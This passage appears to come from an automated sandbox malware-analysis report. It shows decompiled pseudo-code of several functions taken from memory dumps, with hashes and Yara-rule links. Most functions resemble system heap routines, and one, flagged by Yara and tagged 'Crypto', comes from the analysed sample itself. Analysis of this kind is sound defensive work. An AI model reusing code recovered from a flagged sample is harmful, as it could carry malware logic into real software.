				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E034721E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x338ac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x338ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x338ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x338ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x338ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x338ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x338ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x338ac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x3496110; // 0xa1843604
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x3496110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E033BFFB0(_t77, _t114, _t114);
						}
						_t63 = E03472FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E033C2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}




















                                          0x034722b9
                                          0x034722c2
                                          0x034722c6
                                          0x034722c8
                                          0x034722d8
                                          0x034722e2
                                          0x03472303
                                          0x03472314
                                          0x03472321
                                          0x0347234a
                                          0x0347235b
                                          0x0347236c
                                          0x03472372
                                          0x03472376
                                          0x0347238f
                                          0x0347238f
                                          0x034723b4
                                          0x034723c6
                                          0x034723c9
                                          0x034723cc
                                          0x034723cf
                                          0x034723cf
                                          0x034723e9
                                          0x034723ee
                                          0x034723f8
                                          0x034723fb
                                          0x034723fb
                                          0x03472403
                                          0x0347240a
                                          0x03472378
                                          0x0347237b
                                          0x03472381
                                          0x03472385
                                          0x03472385
                                          0x0347238d
                                          0x00000000
                                          0x00000000
                                          0x0347238d
                                          0x03472376
                                          0x03472417

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a8f08b04d832e20b7c4beb485e287c35288b7a2fa7dfd276e884ba8d55aecaee
                                          • Instruction ID: 27ff45bf9bb5c95a4bc75aa06c1b12eca0c78c1a930948b4e2d506db592b09b2
                                          • Opcode Fuzzy Hash: a8f08b04d832e20b7c4beb485e287c35288b7a2fa7dfd276e884ba8d55aecaee
                                          • Instruction Fuzzy Hash: 7841E3711043414BC704DF29C8A19BBBBE0EF85225F094A5EF4D58B2C2CF38D80ADBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 034720A8, Relevance: .1, Instructions: 114COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E034720A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x3496110; // 0xa1843604
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x3496110; // 0xa1843604
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E03472E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x3496110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E03472E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x3496110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E03472E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x3496110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x3496110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}





















                                          0x034720a8
                                          0x034720b0
                                          0x034720b6
                                          0x034720ba
                                          0x034720be
                                          0x034720c4
                                          0x034720cb
                                          0x034720db
                                          0x034720e4
                                          0x034720e7
                                          0x034720e9
                                          0x034720ef
                                          0x034720f1
                                          0x034720fe
                                          0x03472102
                                          0x03472105
                                          0x03472105
                                          0x03472107
                                          0x0347210d
                                          0x03472112
                                          0x03472115
                                          0x03472120
                                          0x03472120
                                          0x03472107
                                          0x03472126
                                          0x03472131
                                          0x03472133
                                          0x0347213e
                                          0x0347213e
                                          0x03472140
                                          0x03472146
                                          0x0347214b
                                          0x03472156
                                          0x03472156
                                          0x03472140
                                          0x0347215f
                                          0x03472165
                                          0x03472170
                                          0x03472172
                                          0x0347217d
                                          0x0347217d
                                          0x0347217f
                                          0x03472185
                                          0x03472192
                                          0x03472192
                                          0x0347217f
                                          0x03472170
                                          0x03472197
                                          0x03472199
                                          0x034721a1
                                          0x034721b1
                                          0x034721bf
                                          0x034721d6
                                          0x034721d6
                                          0x034721bf
                                          0x034721dd
                                          0x034721e5

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eb6356e97a14716045946fa0d598553f5e289180aa9c099578aca22fefc1e1c6
                                          • Instruction ID: 65e61797007d8d15611bae9caff0266f21b8c76f66bbb8e9ba41ed35098688a7
                                          • Opcode Fuzzy Hash: eb6356e97a14716045946fa0d598553f5e289180aa9c099578aca22fefc1e1c6
                                          • Instruction Fuzzy Hash: 5541B133E1402A8BCB18DF68C4919BAF3F5FB48314B5606BED805AF295DB74AD41CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03472D07, Relevance: .1, Instructions: 112COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E03472D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E034721E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x338ac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x338ac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x338ac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x338ac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x338ac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x338ac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x338ac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x338ac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x3496110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x3496110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x3496110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E033BB090(_v24, _t91, _v12, _t29);
			}
























                                          0x03472d1f
                                          0x03472d2c
                                          0x03472d31
                                          0x03472d33
                                          0x03472d42
                                          0x03472d4b
                                          0x03472d51
                                          0x03472d5d
                                          0x03472d62
                                          0x03472d6e
                                          0x03472d71
                                          0x03472d7d
                                          0x03472d87
                                          0x03472d8d
                                          0x03472d91
                                          0x03472da5
                                          0x03472db7
                                          0x03472dc8
                                          0x03472dcf
                                          0x03472dd1
                                          0x03472dd3
                                          0x03472dd6
                                          0x03472ddb
                                          0x03472ddd
                                          0x00000000
                                          0x03472ddf
                                          0x03472df5
                                          0x03472e0e
                                          0x03472e12
                                          0x03472e1a
                                          0x03472e1c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03472e14
                                          0x03472e16
                                          0x03472e22
                                          0x03472e22
                                          0x03472e18
                                          0x03472e18
                                          0x00000000
                                          0x03472e18
                                          0x03472e16
                                          0x03472df7
                                          0x03472df7
                                          0x03472dfc
                                          0x03472e04
                                          0x03472e06
                                          0x03472e1e
                                          0x03472e1e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03472dfe
                                          0x03472e00
                                          0x03472e08
                                          0x03472e08
                                          0x03472e02
                                          0x03472e02
                                          0x00000000
                                          0x03472e02
                                          0x03472e00
                                          0x03472dfc
                                          0x00000000
                                          0x03472df5
                                          0x03472ddf
                                          0x03472e26
                                          0x03472e26
                                          0x03472e3c

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 615bcd9324defec071d354ce6c682dc5769bf45a5442f43e34ca8795afb230ab
                                          • Instruction ID: 1c2cbc3e7ab8e8525a0c53ac8a0f8da6f46ee54eb231cce1cd4dc2c724a217b9
                                          • Opcode Fuzzy Hash: 615bcd9324defec071d354ce6c682dc5769bf45a5442f43e34ca8795afb230ab
                                          • Instruction Fuzzy Hash: FC4129319042554FC755CB6AC8E06FBBFF5EF89201B0E45ABE881DF282DA38C506D760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 034269A6, Relevance: .1, Instructions: 108COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E034269A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x349d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L033B6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03426BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E033E9980() >= 0) {
							E033C2280(_t56, 0x3498778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3498774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3498774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E033AB6F0(0x338c338, 0x338c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E033E9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E033E95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E033BFFB0(_t68, _t77, 0x3498778);
				}
				_pop(_t78);
				return E033EB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                          0x034269b5
                                          0x034269be
                                          0x034269c3
                                          0x034269c9
                                          0x034269cc
                                          0x034269d1
                                          0x034269d3
                                          0x034269de
                                          0x034269e1
                                          0x034269ea
                                          0x034269f6
                                          0x034269fe
                                          0x03426a13
                                          0x03426a14
                                          0x03426a15
                                          0x03426a16
                                          0x03426a1e
                                          0x03426a26
                                          0x03426a31
                                          0x03426a36
                                          0x03426a37
                                          0x03426a40
                                          0x03426a49
                                          0x03426a4a
                                          0x03426a53
                                          0x03426a59
                                          0x03426a5d
                                          0x03426a5e
                                          0x03426a64
                                          0x03426a67
                                          0x03426a6a
                                          0x03426a6d
                                          0x03426a70
                                          0x03426a77
                                          0x03426a7d
                                          0x03426a86
                                          0x03426a89
                                          0x03426a9c
                                          0x03426a9f
                                          0x03426aa2
                                          0x03426aa5
                                          0x03426aaf
                                          0x03426ab1
                                          0x03426ab8
                                          0x03426ab9
                                          0x03426abb
                                          0x03426abe
                                          0x03426ac5
                                          0x03426ac5
                                          0x03426aaf
                                          0x03426a40
                                          0x03426a26
                                          0x034269fe
                                          0x03426ace
                                          0x03426ad0
                                          0x03426ad3
                                          0x03426ad8
                                          0x03426adf
                                          0x03426adf
                                          0x03426ae8
                                          0x03426aef
                                          0x03426aef
                                          0x03426af9
                                          0x03426b06

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8074013a02abd0bb498528516ae861b8ba076527e0bd2ab005ed72b17c5ec1ca
                                          • Instruction ID: 1a63a9176522414fe0dc252ce2fb8f7c4ac88afb93ce91966893931a643feedb
                                          • Opcode Fuzzy Hash: 8074013a02abd0bb498528516ae861b8ba076527e0bd2ab005ed72b17c5ec1ca
                                          • Instruction Fuzzy Hash: C8419FB1E003189FDB10DFA8C880BEEFBF4EF49304F15816AE915AB240DB749905CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401030, Relevance: .1, Instructions: 108COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                          0x00401030
                                          0x0040105b
                                          0x0040105d
                                          0x00401063
                                          0x00401065
                                          0x00401065
                                          0x00401071
                                          0x00401076
                                          0x0040107c
                                          0x004010ac
                                          0x004010ae
                                          0x004010b4
                                          0x004010ba
                                          0x004010bc
                                          0x004010bc
                                          0x004010cb
                                          0x004010d0
                                          0x004010d6
                                          0x00401101
                                          0x00401103
                                          0x00401109
                                          0x0040110f
                                          0x00401111
                                          0x00401111
                                          0x00401120
                                          0x00401128
                                          0x0040112b
                                          0x0040114f
                                          0x00401156
                                          0x0040115d
                                          0x00401169
                                          0x0040116c
                                          0x0040116f
                                          0x00401173

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                          • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                          • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                          • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033A5210, Relevance: .1, Instructions: 107COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E033A5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E033A52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E033E95D0();
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E033BEB70(_t54, 0x34979a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E033E95D0();
								L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E033BEB70(_t54, 0x34979a0);
						}
						return _t52;
					}
					L5:
					_t33 = E033EF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E033BEB70(_t54, 0x34979a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E033E95D0();
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                          0x033a5220
                                          0x033a5224
                                          0x03400d13
                                          0x03400d16
                                          0x03400d19
                                          0x033a522a
                                          0x033a522a
                                          0x033a522d
                                          0x033a522d
                                          0x033a5231
                                          0x033a5235
                                          0x033a5239
                                          0x03400d5c
                                          0x03400d62
                                          0x00000000
                                          0x00000000
                                          0x03400d6a
                                          0x03400d7b
                                          0x03400d7f
                                          0x03400d81
                                          0x03400d84
                                          0x03400d95
                                          0x03400d95
                                          0x03400d6c
                                          0x03400d71
                                          0x03400d71
                                          0x03400d9a
                                          0x00000000
                                          0x033a524a
                                          0x033a524a
                                          0x033a5250
                                          0x03400d24
                                          0x03400d35
                                          0x03400d39
                                          0x03400d3b
                                          0x03400d3e
                                          0x03400d50
                                          0x03400d50
                                          0x03400d26
                                          0x03400d2b
                                          0x03400d2b
                                          0x00000000
                                          0x03400d55
                                          0x033a5256
                                          0x033a525b
                                          0x033a5265
                                          0x03400da7
                                          0x033a526b
                                          0x033a526e
                                          0x033a5272
                                          0x03400db1
                                          0x03400db4
                                          0x03400dc5
                                          0x03400dc5
                                          0x033a5272
                                          0x033a5278
                                          0x033a527e
                                          0x033a528a
                                          0x033a528c
                                          0x033a528d
                                          0x00000000
                                          0x033a5280
                                          0x033a5282
                                          0x033a5288
                                          0x033a529f
                                          0x033a5292
                                          0x00000000
                                          0x033a5292
                                          0x00000000
                                          0x033a5288
                                          0x033a527e

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30ca90d80a359b6ef5b066ab0cd5b6a747fdcca88af3dbde0a6b22b3c4ae1866
                                          • Instruction ID: e13439ecf40530f6947145f3fc94231ece0f38f62dd22ebc806ae07f23f7091d
                                          • Opcode Fuzzy Hash: 30ca90d80a359b6ef5b066ab0cd5b6a747fdcca88af3dbde0a6b22b3c4ae1866
                                          • Instruction Fuzzy Hash: B531E531651B10EBD725EB18CCC0B66B769FF11760F15462AE8690F6D0DB70E800CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DA61C, Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E033DA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x3480220);
				E033FD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3497b9c; // 0x0
				_t55 = L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E033FD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3497b10 =  *0x3497b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x349536c; // 0x77ad5368
					if( *_t51 != 0x3495368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3495368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x349536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E033DA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
